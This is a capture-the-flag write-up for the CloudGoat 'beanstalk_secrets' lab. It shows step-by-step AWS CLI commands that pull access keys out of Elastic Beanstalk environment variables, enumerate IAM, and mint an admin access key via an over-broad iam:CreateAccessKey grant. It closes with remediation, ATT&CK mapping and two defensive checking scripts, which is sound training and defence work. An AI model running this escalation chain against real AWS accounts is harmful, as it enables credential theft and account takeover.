🄷 CloudGoat: Beanstalk Secrets (AWS CLI)

Write-up: From low-privilege user to admin (AWS CLI approach)

📅 2026-01-11

🧭 Overview

Scenario: beanstalk_secrets
Platform: CloudGoat (Rhino Security Labs)
Tools: AWS CLI (no exploitation frameworks)
Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag.

āš”ļø Attack Path Summary

Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → CreateAccessKey → Admin → Flag

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile

aws configure --profile ebs-1
# Access Key: AKIA****************
# Secret Key: EOyTyXYE/DwNCFAHmFSla5SWz**************

Validate Credentials

aws sts get-caller-identity --profile ebs-1

{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_low_priv_user"
}

🔎 Phase 2: Elastic Beanstalk Enumeration

List Applications

aws elasticbeanstalk describe-applications --profile ebs-1

Found: cgid09kivyz0ga-app - "Elastic Beanstalk application for insecure secrets scenario"

List Environments

aws elasticbeanstalk describe-environments --profile ebs-1

Property     Value
Environment  cgid09kivyz0ga-env
Application  cgid09kivyz0ga-app
Platform     Python 3.11 on Amazon Linux 2023
Status       Ready

Extract Configuration Settings

aws elasticbeanstalk describe-configuration-settings \
  --application-name cgid09kivyz0ga-app \
  --environment-name cgid09kivyz0ga-env \
  --query "ConfigurationSettings[0].OptionSettings[?Namespace=='aws:elasticbeanstalk:application:environment']" \
  --output table \
  --profile ebs-1

Namespace                                     Name                  Value
aws:elasticbeanstalk:application:environment  PYTHONPATH            /var/app/venv/staging-LQM1lest/bin
aws:elasticbeanstalk:application:environment  SECONDARY_ACCESS_KEY  AKIA****************
aws:elasticbeanstalk:application:environment  SECONDARY_SECRET_KEY  19jM1vKF4UQqw8vJo6FwKKxd**************

Credentials extracted from environment variables.

👤 Phase 3: Pivot to Secondary User

Configure Secondary Profile

aws configure --profile ebs-2
# Access Key: AKIA****************
# Secret Key: 19jM1vKF4UQqw8vJo6FwKKxd**************

Validate Credentials

aws sts get-caller-identity --profile ebs-2

Confirmed: cgid09kivyz0ga_secondary_user

šŸ—„ļø Phase 4: IAM Enumeration

Enumeration Workflow

list-users → list-attached-user-policies → get-policy → get-policy-version

List All Users

aws iam list-users --profile ebs-2

Username                       Note
cgid09kivyz0ga_admin_user      Target
cgid09kivyz0ga_low_priv_user   Initial access
cgid09kivyz0ga_secondary_user  Current user

Enumerate Secondary User's Policies

aws iam list-attached-user-policies \
  --user-name cgid09kivyz0ga_secondary_user \
  --profile ebs-2

{
  "AttachedPolicies": [
    {
      "PolicyName": "cgid09kivyz0ga_secondary_policy",
      "PolicyArn": "arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy"
    }
  ]
}

Get Policy Details

aws iam get-policy \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --profile ebs-2

Noted DefaultVersionId: v1

Extract Policy Document

aws iam get-policy-version \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --version-id v1 \
  --profile ebs-2

{
  "Statement": [
    {
      "Action": [
        "iam:CreateAccessKey"
      ],
      "Effect": "Allow",
      "Resource": "*"
    },
    {
      "Action": [
        "iam:ListRoles",
        "iam:GetRole",
        "iam:ListPolicies",
        "iam:GetPolicy",
        "iam:ListPolicyVersions",
        "iam:GetPolicyVersion",
        "iam:ListUsers",
        "iam:GetUser",
        "iam:ListGroups",
        "iam:GetGroup",
        "iam:ListAttachedUserPolicies",
        "iam:ListAttachedRolePolicies",
        "iam:GetRolePolicy"
      ],
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}

Critical Finding

Permission           Resource      Impact
iam:CreateAccessKey  * (wildcard)  Can create access keys for ANY user, including admin
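An added example, not part of the original write-up: a small offline policy checker that flags exactly the finding above, an Allow statement granting iam:CreateAccessKey on any resource other than the caller's own user. It embeds the page's recovered policy (read-only action list shortened) and the self-scoped statement from the Remediation section; function and variable names are my own.

```python
import fnmatch
import json

# The secondary user's policy recovered in Phase 4, trimmed to its two statements
# (page data, with the long read-only action list shortened).
SECONDARY_POLICY = json.loads("""
{"Statement": [
  {"Action": ["iam:CreateAccessKey"], "Effect": "Allow", "Resource": "*"},
  {"Action": ["iam:ListUsers", "iam:GetUser"], "Effect": "Allow", "Resource": "*"}
]}
""")

# The remediated form from the Remediation section: key creation only for oneself.
SELF_ONLY_POLICY = {"Statement": [{
    "Effect": "Allow", "Action": "iam:CreateAccessKey",
    "Resource": "arn:aws:iam::*:user/${aws:username}"}]}

def _as_list(value):
    """Action, Resource and Statement may each be a string/object or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _grants(pattern, action):
    """IAM action patterns are case-insensitive globs (iam:*, iam:Create*)."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())

def find_unscoped_create_access_key(policy):
    """Return the Resource values of each Allow statement granting
    iam:CreateAccessKey on anything other than the caller's own user.
    NotAction/NotResource and Condition blocks are not modelled here."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        if not any(_grants(p, "iam:CreateAccessKey") for p in actions):
            continue
        for resource in _as_list(stmt.get("Resource")):
            # Only a resource pinned to the caller's own user name is self-scoped.
            if not resource.endswith(":user/${aws:username}"):
                findings.append(resource)
    return findings

if __name__ == "__main__":
    print("secondary policy:", find_unscoped_create_access_key(SECONDARY_POLICY))  # ['*']
    print("self-only policy:", find_unscoped_create_access_key(SELF_ONLY_POLICY))  # []
```

The same check run over every customer-managed policy version in an account (via get-policy-version, as in the enumeration above) gives a quick inventory of principals that can mint keys for others.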

💥 Phase 5: Privilege Escalation

Create Access Key for Admin User

aws iam create-access-key \
  --user-name cgid09kivyz0ga_admin_user \
  --profile ebs-2

{
  "AccessKey": {
    "UserName": "cgid09kivyz0ga_admin_user",
    "AccessKeyId": "AKIA****************",
    "Status": "Active",
    "SecretAccessKey": "C8aC3UMs1rMewHHLwAHxxk4T**************"
  }
}

Configure Admin Profile

aws configure --profile admin
aws sts get-caller-identity --profile admin

{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_admin_user"
}

Privilege escalation successful.

🚩 Phase 6: Capture the Flag

List Secrets

aws secretsmanager list-secrets --profile admin --region us-east-1

Found: cgid09kivyz0ga_final_flag

Retrieve Flag

aws secretsmanager get-secret-value \
  --secret-id cgid09kivyz0ga_final_flag \
  --profile admin \
  --region us-east-1
FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}

šŸ“ Attack Chain Diagram

┌─────────────────────┐
│   Low-Priv User     │
│   (ebs-1 profile)   │
└──────────┬──────────┘
           │ elasticbeanstalk:DescribeConfigurationSettings
           ▼
┌─────────────────────┐
│  Beanstalk Secrets  │
│  - Access Key       │
│  - Secret Key       │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│   Secondary User    │
│   (ebs-2 profile)   │
└──────────┬──────────┘
           │ iam:CreateAccessKey (Resource: *)
           ▼
┌─────────────────────┐
│     Admin User      │
│   (admin profile)   │
└──────────┬──────────┘
           │ secretsmanager:GetSecretValue
           ▼
┌─────────────────────┐
│        FLAG         │
└─────────────────────┘

🚨 Vulnerabilities Exploited

#  Vulnerability                                             CWE
1  Hardcoded credentials in Beanstalk environment variables  CWE-798
2  Overly permissive IAM policy (iam:CreateAccessKey on *)   CWE-732
3  Lack of least privilege principle                         CWE-250

💡 Remediation

  1. Do not store long-lived AWS credentials in environment variables - Use AWS Secrets Manager or SSM Parameter Store
  2. Restrict iam:CreateAccessKey - Scope to self only:
     {
       "Effect": "Allow",
       "Action": "iam:CreateAccessKey",
       "Resource": "arn:aws:iam::*:user/${aws:username}"
     }
  3. Enable CloudTrail alerts for CreateAccessKey API calls
  4. Regular IAM Access Analyzer scans to detect overly permissive policies
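An added example for remediation item 3, not part of the original write-up: the detection logic a CloudTrail alert would need, run over constructed sample records. It flags a CreateAccessKey call whose target user differs from the calling principal, which is exactly the Phase 5 move, while ignoring a user rotating their own key. The records, IPs and account details are constructed sample data; function names are my own.

```python
# Constructed CloudTrail records (sample data, not real logs). IPs are
# documentation-range placeholders; user names follow the scenario above.
SAMPLE_EVENTS = [
    {   # Secondary user minting a key for the admin user: the Phase 5 move.
        "eventTime": "2026-01-11T10:00:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "cgid09kivyz0ga_secondary_user"},
        "requestParameters": {"userName": "cgid09kivyz0ga_admin_user"},
    },
    {   # Admin rotating their own key: userName omitted means "the caller".
        "eventTime": "2026-01-11T11:00:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.11",
        "userIdentity": {"type": "IAMUser", "userName": "cgid09kivyz0ga_admin_user"},
        "requestParameters": None,
    },
    {   # Unrelated read-only call from the enumeration phase; must not alert.
        "eventTime": "2026-01-11T09:59:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "ListUsers", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "cgid09kivyz0ga_secondary_user"},
        "requestParameters": None,
    },
]

def caller_name(record):
    """Name of the principal that made the call; falls back to the ARN's last segment
    (e.g. the session name of an assumed role) when userName is absent."""
    ident = record.get("userIdentity") or {}
    return ident.get("userName") or ident.get("arn", "").rsplit("/", 1)[-1]

def flag_cross_user_key_creation(records):
    """Return one alert per CreateAccessKey call whose target user is not the caller."""
    alerts = []
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue
        if rec.get("eventName") != "CreateAccessKey":
            continue
        actor = caller_name(rec)
        params = rec.get("requestParameters") or {}
        target = params.get("userName") or actor   # no userName => key for the caller
        if target != actor:
            alerts.append({"time": rec["eventTime"], "actor": actor,
                           "target": target, "source_ip": rec.get("sourceIPAddress")})
    return alerts

if __name__ == "__main__":
    for alert in flag_cross_user_key_creation(SAMPLE_EVENTS):
        print(f"ALERT {alert['time']}: {alert['actor']} created a key for {alert['target']}")
```

Self-rotation is deliberately left out of the alert list; in an account where only a small set of identities should ever create keys for others, even that allow-list can be reduced to zero.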

🎯 MITRE ATT&CK Mapping

Tactic                Technique                                                            ID
Credential Access     Unsecured Credentials: Credentials in Files / Environment Variables  T1552.001
Discovery             Cloud Service Discovery                                              T1526
Privilege Escalation  Valid Accounts: Cloud Accounts                                       T1078.004
Persistence           Account Manipulation: Additional Cloud Credentials                   T1098.001

šŸ› ļø Commands Reference

# Beanstalk Enumeration
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-environments
aws elasticbeanstalk describe-configuration-settings --application-name X --environment-name Y

# IAM Enumeration Workflow
aws iam list-users
aws iam list-attached-user-policies --user-name X
aws iam list-user-policies --user-name X
aws iam get-policy --policy-arn X
aws iam get-policy-version --policy-arn X --version-id vN

# Privilege Escalation
aws iam create-access-key --user-name X

# Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id X